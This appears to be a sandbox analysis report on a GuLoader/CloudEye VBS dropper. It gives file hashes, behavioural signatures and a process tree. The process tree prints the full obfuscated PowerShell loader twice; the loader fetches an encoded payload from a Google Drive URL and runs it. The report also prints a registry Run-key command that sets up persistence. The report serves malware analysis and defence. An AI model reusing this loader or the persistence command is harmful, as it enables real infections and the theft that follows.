Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21-05-2024 15:42
Static task
static1
Behavioral task
behavioral1
Sample
Swift 2024052130819616.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Swift 2024052130819616.vbs
Resource
win10v2004-20240426-en
General
-
Target
Swift 2024052130819616.vbs
-
Size
13KB
-
MD5
693d91041a54a578ada0c38a77634ee9
-
SHA1
13e0a6c85203356af7d11ff4a0e74a6b9637f466
-
SHA256
bb8d35012cdd6408e23b9983549095e98a88c1ccf99fc447cb92bf9d6de71b91
-
SHA512
110e25ec6a8f8cb52a3d8a21e01ae9e2b308276111a70cd2afd64e187b41fbbedf9365170bacd971b26ee17a62df4b2174dd2580bcdb18ed768a06d01d860ccb
-
SSDEEP
192:lLZMMji78HauxUn+OKEtfuJkEF3UxO8OY7DIsRsTYEtoTP5CfQ6x7PwYVRWFo2Uj:DV8wtkyRi/aVvdb2ze
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 6 2692 powershell.exe 8 2692 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 1784 wab.exe 1784 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2332 powershell.exe 1784 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2332 set thread context of 1784 2332 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2692 powershell.exe 2332 powershell.exe 2332 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
WScript.execmd.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 3028 wrote to memory of 1768 3028 WScript.exe cmd.exe PID 3028 wrote to memory of 1768 3028 WScript.exe cmd.exe PID 3028 wrote to memory of 1768 3028 WScript.exe cmd.exe PID 1768 wrote to memory of 2344 1768 cmd.exe PING.EXE PID 1768 wrote to memory of 2344 1768 cmd.exe PING.EXE PID 1768 wrote to memory of 2344 1768 cmd.exe PING.EXE PID 3028 wrote to memory of 2692 3028 WScript.exe powershell.exe PID 3028 wrote to memory of 2692 3028 WScript.exe powershell.exe PID 3028 wrote to memory of 2692 3028 WScript.exe powershell.exe PID 2692 wrote to memory of 2564 2692 powershell.exe cmd.exe PID 2692 wrote to memory of 2564 2692 powershell.exe cmd.exe PID 2692 wrote to memory of 2564 2692 powershell.exe cmd.exe PID 2692 wrote to memory of 2332 2692 powershell.exe powershell.exe PID 2692 wrote to memory of 2332 2692 powershell.exe powershell.exe PID 2692 wrote to memory of 2332 2692 powershell.exe powershell.exe PID 2692 wrote to memory of 2332 2692 powershell.exe powershell.exe PID 2332 wrote to memory of 2460 2332 powershell.exe cmd.exe PID 2332 wrote to memory of 2460 2332 powershell.exe cmd.exe PID 2332 wrote to memory of 2460 2332 powershell.exe cmd.exe PID 2332 wrote to memory of 2460 2332 powershell.exe cmd.exe PID 2332 wrote to memory of 1784 2332 powershell.exe wab.exe PID 2332 wrote to memory of 1784 2332 powershell.exe wab.exe PID 2332 wrote to memory of 1784 2332 powershell.exe wab.exe PID 2332 wrote to memory of 1784 2332 powershell.exe wab.exe PID 2332 wrote to memory of 1784 2332 powershell.exe wab.exe PID 2332 wrote to memory of 1784 2332 powershell.exe wab.exe PID 1784 wrote to memory of 2156 1784 wab.exe cmd.exe PID 1784 wrote to memory of 2156 1784 wab.exe cmd.exe PID 1784 wrote to memory of 2156 1784 wab.exe cmd.exe PID 1784 wrote to memory of 2156 1784 wab.exe cmd.exe PID 2156 wrote to memory of 1404 2156 cmd.exe reg.exe PID 2156 wrote to memory of 1404 2156 cmd.exe reg.exe PID 2156 wrote to memory of 1404 2156 cmd.exe reg.exe PID 2156 wrote to memory of 1404 2156 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\cmd.execmd.exe /c ping 6777.6777.6777.677e2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\PING.EXEping 6777.6777.6777.677e3⤵
- Runs ping.exe
PID:2344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"3⤵PID:2564
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"4⤵PID:2460
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"5⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:1404
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NMVHAWC4JUP45QYF4J1X.temp
Filesize7KB
MD5d67dd93a9e8101b470d1515d0ed0bf71
SHA18e669de97d9115b671c375568d4591c0d30add01
SHA256a69a74ce6b0c93318557667b4b8dba78e8467e078fa4974677bcb0c2614a1fef
SHA512ca25afab24a62dc9bdc5f470153c0f10483dba5088f0c4b199760c68487907a20767ef6f2f546434aa6198251f2b648f1b7ec390453bb9ee484543e1917f1a01
-
Filesize
476KB
MD55b31fdcca43851229c6ad5c0d5124d9e
SHA195243324bfd6acd008518e233e5ac3a7a29e67a5
SHA256c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842
SHA512e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5